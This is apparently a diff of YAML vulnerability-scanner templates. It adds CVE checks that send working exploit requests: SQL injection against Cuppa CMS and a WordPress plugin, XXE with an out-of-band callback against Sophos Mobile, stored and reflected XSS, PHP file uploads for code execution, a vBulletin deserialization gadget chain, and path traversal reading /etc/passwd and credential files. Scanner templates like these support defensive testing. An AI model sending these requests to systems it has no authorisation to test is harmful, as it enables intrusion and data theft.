- "{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- text/plain
- type: status
status:
- 200

46
http/cves/2022/CVE-2022-27984.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2022-27984
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: critical
description: |
CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-27984
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-27984
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
@timeout: 20s
POST /templates/default/html/windows/right.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
menu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "components/menu/classes/functions.php")'
condition: and

55
http/cves/2022/CVE-2022-27985.yaml Normal file
View File

@ -0,0 +1,55 @@
id: CVE-2022-27985
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: critical
description: |
CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-27985
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-27985
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
variables:
num: '999999999'
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
POST /alerts/alertLightbox.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
url=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

44
http/cves/2022/CVE-2022-3980.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2022-3980
info:
name: Sophos Mobile managed on-premises - XML External Entity Injection
author: dabla
severity: critical
description: |
An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
reference:
- https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
- https://nvd.nist.gov/vuln/detail/CVE-2022-3980
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-611
cve-id: CVE-2022-3980
metadata:
max-request: 1
verified: "true"
shodan-query: http.favicon.hash:-1274798165
fofa-query: title="Sophos Mobile"
tags: cve,cve2022,xxe,ssrf,sophos
http:
- raw:
- |
@timeout: 50s
POST /servlets/OmaDsServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: "application/xml"
<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % test SYSTEM "http://{{interactsh-url}}">%test;]>
<cdl>test</cdl>
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
- "status_code == 400"
- "len(body) == 0"
condition: and

80
http/cves/2022/CVE-2022-42095.yaml Normal file
View File

@ -0,0 +1,80 @@
id: CVE-2022-42095
info:
name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.
reference:
- https://github.com/backdrop/backdrop/releases/tag/1.23.0
- https://github.com/bypazs/CVE-2022-42095
- https://nvd.nist.gov/vuln/detail/CVE-2022-42095
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2022-42095
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,cms,backdrop,authenticated
http:
- raw:
- |
GET /?q=user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
- |
GET /?q=node/add/page HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=node/add/page HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
title={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save
- |
POST /?q={{randstr}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- "status_code_5 == 200"
- "contains(all_headers_5, 'text/html')"
- 'contains(body_5, "<img src=\"x\" onerror=\"alert(document.domain)\" />")'
- "contains(body_5, 'Backdrop CMS')"
condition: and
extractors:
- type: regex
name: form_id_1
group: 1
regex:
- 'name="form_build_id" value="(.*)"'
internal: true
- type: regex
name: form_id_2
group: 1
regex:
- 'name="form_build_id" value="(.*)"'
internal: true
- type: regex
name: form_token
group: 1
regex:
- 'name="form_token" value="(.*)"'
internal: true

185
http/cves/2022/CVE-2022-42096.yaml Normal file
View File

@ -0,0 +1,185 @@
id: CVE-2022-42096
info:
name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.
reference:
- https://github.com/backdrop/backdrop/releases/tag/1.23.0
- https://github.com/bypazs/CVE-2022-42096
- https://nvd.nist.gov/vuln/detail/CVE-2022-42096
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2022-42096
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,cms,backdrop,authenticated
http:
- raw:
- |
GET /?q=user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
- |
GET /?q=node/add/post HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=node/add/post HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="title"
{{randstr}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_tags[und]"
{{randstr}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][summary]"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][value]"
<img src=x onerror=alert(document.domain)>
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][format]"
full_html
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_image[und][0][fid]"
0
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_image[und][0][display]"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="changed"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_build_id"
{{form_id_1}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_token"
{{form_token}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_id"
{{form_id_2}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="status"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="scheduled[date]"
2023-04-25
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="scheduled[time]"
16:59:23
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="promote"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="name"
{{name}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="date[date]"
2023-04-24
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="date[time]"
16:59:23
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="path[auto]"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="comment"
2
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="additional_settings__active_tab"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="op"
Save
------WebKitFormBoundaryIubltUxssi0yqDjp--
- |
GET /?q=posts/{{randstr}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src="x" onerror="alert(document.domain)" />'
- 'Backdrop CMS'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: form_id_1
group: 1
regex:
- 'name="form_build_id" value="(.*)"'
internal: true
- type: regex
name: name
group: 1
regex:
- 'name="name" value="(.*?)"'
internal: true
- type: regex
name: form_id_2
group: 1
regex:
- 'name="form_id" value="(.*)"'
internal: true
- type: regex
name: form_token
group: 1
regex:
- 'name="form_token" value="(.*)"'
internal: true

56
http/cves/2022/CVE-2022-4328.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2022-4328
info:
name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
remediation: Fixed in version 18.0
reference:
- https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
- https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4328
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4328
cwe-id: CWE-434
metadata:
verified: "true"
tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597
--------------------------22728be7b3104597
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
<?php echo md5("CVE-2022-4328"); ?>
--------------------------22728be7b3104597--
- |
GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "fe5df26ce4ca0056ffae8854469c282f"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

100
http/cves/2022/CVE-2022-45037.yaml Normal file
View File

@ -0,0 +1,100 @@
id: CVE-2022-45037
info:
name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.
reference:
- https://github.com/WBCE/WBCE_CMS
- https://shimo.im/docs/dPkpKPQEjXfvYoqO/read
- https://nvd.nist.gov/vuln/detail/CVE-2022-45037
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-45037
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wbce,cms,authenticated
http:
- raw:
- |
GET /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
- |
GET /admin/users/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/users/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
formtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
- |
GET /admin/users/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_5
words:
- "<script>alert(document.domain)</script>"
- "SESSION_TIMEOUT"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: username_fieldname
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true
- type: regex
name: password_fieldname
part: body
group: 1
regex:
- 'name="password_fieldname" value="(.*)"'
internal: true
- type: regex
name: formtoken
part: body
group: 1
regex:
- 'name="formtoken" value="(.*)"'
internal: true
- type: regex
name: username_fieldname_2
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true

100
http/cves/2022/CVE-2022-45038.yaml Normal file
View File

@ -0,0 +1,100 @@
id: CVE-2022-45038
info:
name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.
reference:
- https://github.com/WBCE/WBCE_CMS
- https://shimo.im/docs/Ee32MrJd80iEwyA2/read
- https://nvd.nist.gov/vuln/detail/CVE-2022-45038
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-45038
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wbce,cms,authenticated
http:
- raw:
- |
GET /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
- |
GET /admin/settings/ HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/settings/save.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
advanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=
- |
GET /search/index.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "Results For"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: username_fieldname
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true
- type: regex
name: password_fieldname
part: body
group: 1
regex:
- 'name="password_fieldname" value="(.*)"'
internal: true
- type: regex
name: formtoken
part: body
group: 1
regex:
- 'name="formtoken" value="(.*)"'
internal: true
- type: regex
name: app_name
part: body
group: 1
regex:
- 'name="app_name" value="(.*?)"'
internal: true

131
http/cves/2022/CVE-2022-46020.yaml Normal file
View File

@ -0,0 +1,131 @@
id: CVE-2022-46020
info:
name: WBCE CMS v1.5.4 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.
reference:
- https://github.com/WBCE/WBCE_CMS
- https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2022-46020
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-46020
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2022,rce,wbce,cms,authenticated
http:
- raw:
- |
GET /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
- |
GET /admin/settings/index.php?advanced=yes HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/settings/save.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=
- |
POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="reqid"
test
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="cmd"
upload
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="target"
l1_Lw
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="upload[]"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php
echo md5("CVE-2022-46020");
?>
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="mtime[]"
test
-----------------------------213974337328367932543216511988--
- |
GET /media/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_6
words:
- "751a8ba516522786d551075a092a7a84"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: username_fieldname
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true
- type: regex
name: password_fieldname
part: body
group: 1
regex:
- 'name="password_fieldname" value="(.*)"'
internal: true
- type: regex
name: formtoken
part: body
group: 1
regex:
- 'name="formtoken" value="(.*)"'
internal: true
- type: regex
name: app_name
part: body
group: 1
regex:
- 'name="app_name" value="(.*)"'
internal: true

47
http/cves/2023/CVE-2023-1020.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2023-1020
info:
name: Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
reference:
- https://wpscan.com/vulnerability/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff
- https://wordpress.org/plugins/wp-shoutbox-live-chat/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1020
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-1020
cwe-id: CWE-89
metadata:
verified: "true"
tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
matchers-condition: and
matchers:
- type: word
part: body
words:
- "c8c605999f3d8352d7bb792cf3fdb25b"
- "no_participation"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

2
http/cves/2023/CVE-2023-20864.yaml
View File

@ -14,7 +14,7 @@ info:
shodan-query: title:"vRealize Log Insight"
tags: cve,cve2023,vmware,aria,rce,oast
requests:
http:
- raw:
- |
GET /csrf HTTP/1.1

49
http/cves/2023/CVE-2023-25135.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2023-25135
info:
name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
reference:
- https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
- https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py
- https://nvd.nist.gov/vuln/detail/CVE-2023-25135
- https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch
remediation: The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-502
metadata:
max-request: 1
verified: "true"
google-query: intext:"Powered By vBulletin"
shodan-query: http.component:"vBulletin"
tags: cve,cve2023,vbulletin,rce,kev
http:
- raw:
- |
POST /ajax/api/user/save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'string(14)'
- '"CVE-2023-25135"'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

39
http/cves/2023/CVE-2023-30210.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2023-30210
info:
name: OURPHP <= 7.2.0 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.
reference:
- https://www.ourphp.net/
- https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-tz-php-Reflection-xss/
- https://nvd.nist.gov/vuln/detail/CVE-2023-30210
metadata:
verified: "true"
tags: cve,cve2023,xss,ourphp,unauthenticated
http:
- method: GET
path:
- "{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "barmemCachedPercent"
- "swapPercent"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

38
http/cves/2023/CVE-2023-30212.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2023-30212
info:
name: OURPHP <= 7.2.0 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
reference:
- https://www.ourphp.net/
- https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/
- https://nvd.nist.gov/vuln/detail/CVE-2023-30212
classification:
cve-id: CVE-2023-30212
metadata:
verified: "true"
tags: cve,cve2023,xss,ourphp
http:
- method: GET
path:
- "{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "location.href='../..</script><script>alert(document.domain)</script>'"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

6
http/cves/2023/CVE-2023-31059.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2023-31059
info:
name: Repetier Server - Directory Traversal
author: parthmalhotra, pdresearch
author: parthmalhotra,pdresearch
severity: high
description: |
Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.
@ -23,7 +23,7 @@ info:
fofa-query: title="Repetier-Server"
tags: cve,cve2023,repetier,lfi
requests:
http:
- method: GET
path:
- "{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"
@ -37,4 +37,4 @@ requests:
- type: status
status:
- 200
- 200

4
http/default-logins/dell/emcecom-default-login.yaml
View File

@ -24,9 +24,9 @@ http:
payloads:
username:
- root
- admin
password:
- calvin
- #1Password
attack: pitchfork
matchers-condition: and

48
http/exposed-panels/eclipse-birt-panel.yaml Normal file
View File

@ -0,0 +1,48 @@
id: eclipse-birt-panel
info:
name: Eclipse BIRT Panel - Detect
author: Shiva (Strobes Security)
severity: info
description: Eclipse BIRT (Business Intelligence Reporting Tool) detected
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
reference:
- https://eclipse.github.io/birt-website/
metadata:
max-req: 2
verified: "true"
shodan-query: title:"Eclipse BIRT Home"
google-query: intitle:"Eclipse BIRT Home"
tags: panel,eclipsebirt,detect
http:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/reportviewer/'
host-redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- 'alt="Eclipse Logo'
- 'Eclipse BIRT Home'
condition: or
case-insensitive: true
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'Viewer Version : ([0-9.-]+)'

38
http/exposed-panels/jedox-web-panel.yaml Normal file
View File

@ -0,0 +1,38 @@
id: jedox-web-panel
info:
name: Jedox Web Login Panel - Detect
author: Team Syslifters / Christoph MAHRL,Aron MOLNAR,Patrick PIRKER,Michael WEDL
severity: info
description: |
